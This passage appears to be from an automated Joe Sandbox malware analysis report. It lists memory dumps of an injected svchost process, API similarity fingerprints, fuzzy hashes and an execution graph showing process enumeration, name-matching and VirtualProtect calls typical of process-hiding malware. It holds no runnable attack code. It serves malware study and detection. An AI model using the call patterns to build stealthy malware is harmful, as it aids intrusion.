                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: 8ca517f9b7ac8f6baa2d5c867a72ea658b852af3febf746d89eba981be5c2785
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 31112736711F058AEB01CFE0E8653A833E6F759798F440E21EA6DA67A4DB78D1689340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: c6d890b89c49a7a6987264fcd7d01e9e06fb4d1e539db11f6da52319577bfeea
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 68115B36711F048AEB00DFA4E8643E833E4F719759F840E21EA6E96BA8DF78C1588340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 5c5dbde42ff70c2315b6d52bc1034719d03be7e227bb47cdba95bab47f1f08c9
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: 1D719E36340F9242E776DFE698653FA67D6F385B84F400016DD4AA3F88DA34D60AE700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 376fff5770a4a596e260cc35a879d7b55ac1e18754fca75a20926b12c4d5d300
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: E971A136201F8952E736AFAA98647EE77D6F385BC4F484026DD0AA3F88DE75C640C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 3242871069-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 29775ddb8eedb62f5ada1bd054c78af7f280b6f7b68867b30ebbc2d326d0bcc4
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 6151F032311E00CAEF56CFA5E464BAC3BD3F344B98F558165EA5A67B88DB79C841CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: b1bea100d76148bae04666946bc4ea4da6b94d1863638acf32ae679a5d19648a
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 1461AB72508BC4C1EB328F55E4903DABBE1F79AB88F045215EB9827B99DB78D190CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: 289cc0cfee017aced1784072c20722df1c9c11ae38d585e13469654fd3006fa2
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 98512536344F8041E726CEE6A4753FA67D3F3A5780F540025CD5963B99DA39EA0EE740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: 001635b25ecbbca0764ac1bd40efed090f4d1425ca32901256f566a875773509
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 8151E336305B8981E7269EAEA4B47EA7BE3F385B80F484025CD59A3F89DE39C544C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: d238e6998b5e2b77e7a7b46b671436c4e8c6a49a1263db79977df49747d26fd5
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 56411332725E8086E721DFE5E4547DAB3E6F399784F800121EE4D97748EB38D449DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: 56a8855b67026a91c41b2927fdf25b9cf162a7356cba85eee3ecc2f35be29a90
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 94411532625F8086E721DFA5E454BDAB7E2F388784F844121EE4D97B58EF38C441CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 1f0663a2cf57870164fc2c7ef215a478df49844674e22c2ee3273b6fc497c742
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: DE112B32214F8082EB62CB95F454399B7E6F788B94F584220EE8D17B64DF3CD596CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 9f852941d586325415fa13cdfd8bf5ced8ecbe2e3a3872ee2f508464c272930c
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: EB116A32215F8482EB228F29F414289B7E2F789B84F584224EE8D57B68DF7CC551CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: c6bde2f5f7b74ed1ac78c42c291b3df62365bec3f175b714d33f3a2c29db5653
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: 92118B21B01F8081EB16CBE6A8192A977E2F7C9FC0F584024DE8E63724EF38E4469300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: 1578604135d5ec20d7691f9046390aa0cf3ac4c6c3ad8786124130774ae32015
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: 9A11C431A01F8491EB16CBAAA41419977F2FB89FC0F584024DE8EA3B24EF78C442C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 0f6c70fe7d26b32a50828852024bbf15df4beab49a6e5f5a2d1ff665162387e6
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 90E06D31711A049AE7168FE2D82838936E3FBD9F06F44C024C90907350EF7D949DA740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 7dddb5b11e79e2c1677b197449cc23741c8a198749c140a1eed65376eb36c9b5
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 9CE09231601A04AAE7158FE2D8283893AE2FB8DF06F44C024C98A07750EFBD84D9C761
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 7e407ad29bb8089973a9244abba3d547fe5d66ba0724ead9bf4e6c64c4f286c4
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: CFE0ED717219049AE71A9BA2D81429976E3FB99B16F448024C90907310EE38949DA710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 4787daf7e42f4a14c43f04521295530a1fa3462f2fd7cfb85936864433249c56
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: E7E01271611904ABE7199FE2DC143997AE2FF8DF16F448024C94A07710EE7C8499D721

                                                                      Execution Graph

                                                                      Execution Coverage:1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:1958
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 15120 192916234b8 15121 192916234e8 15120->15121 15122 192916235a1 15121->15122 15123 19291623505 PdhGetCounterInfoW 15121->15123 15123->15122 15124 19291623523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15123->15124 15125 19291623555 StrCmpW 15124->15125 15126 1929162358d GetProcessHeap HeapFree 15124->15126 15125->15126 15128 1929162356a 15125->15128 15126->15122 15128->15126 15129 19291623950 StrCmpNW 15128->15129 15130 19291623982 StrStrW 15129->15130 15133 192916239f2 15129->15133 15131 1929162399b StrToIntW 15130->15131 15130->15133 15132 192916239c3 15131->15132 15131->15133 15132->15133 15139 19291621a30 OpenProcess 15132->15139 15133->15128 15140 19291621a64 K32GetModuleFileNameExW 15139->15140 15141 19291621ab6 15139->15141 15142 19291621aad CloseHandle 15140->15142 15143 19291621a7e PathFindFileNameW lstrlenW 15140->15143 15141->15133 15145 19291623f88 15141->15145 15142->15141 15143->15142 15144 19291621a9c StrCpyW 15143->15144 15144->15142 15146 19291623f95 StrCmpNIW 15145->15146 15147 192916239e4 15145->15147 15146->15147 15147->15133 15148 19291621cfc 15147->15148 15149 19291621d1c 15148->15149 15150 19291621d13 15148->15150 15149->15133 15152 19291621530 15150->15152 15153 19291621580 15152->15153 15156 1929162154a 15152->15156 15153->15149 15154 19291621569 StrCmpW 15154->15156 15155 19291621561 StrCmpIW 15155->15156 15156->15153 15156->15154 15156->15155 15157 192913e5c8d 15159 192913e5c94 15157->15159 15158 192913e5cfb 15159->15158 15160 192913e5d77 VirtualProtect 15159->15160 15161 192913e5db1 15160->15161 15162 192913e5da3 GetLastError 15160->15162 15162->15161 15163 192913e2c80 TlsGetValue TlsGetValue TlsGetValue 15164 192913e2cd9 15163->15164 15169 192913e2d51 15163->15169 15167 192913e2ce1 15164->15167 15164->15169 15165 192913e2d4c 15166 192913e2e06 TlsSetValue TlsSetValue TlsSetValue 15166->15165 15167->15165 15167->15166 15171 192913e3f88 15167->15171 15169->15165 15169->15166 15170 192913e3f88 StrCmpNIW 15169->15170 15170->15169 15172 192913e3faa 15171->15172 15173 192913e3f95 StrCmpNIW 15171->15173 15172->15167 15173->15172 16413 19291621bc4 16420 19291621724 GetProcessHeap HeapAlloc 16413->16420 16415 19291621bd3 16416 19291621bda Sleep 16415->16416 16419 1929162159c StrCmpIW StrCmpW 16415->16419 16471 192916219b0 16415->16471 16417 19291621724 50 API calls 16416->16417 16417->16415 16419->16415 16488 19291621264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16420->16488 16422 1929162174c 16489 19291621000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16422->16489 16424 19291621754 16490 19291621264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16424->16490 16426 1929162175d 16491 19291621264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16426->16491 16428 19291621766 16492 19291621264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16428->16492 16430 1929162176f 16493 19291621000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16430->16493 16432 19291621778 16494 19291621000 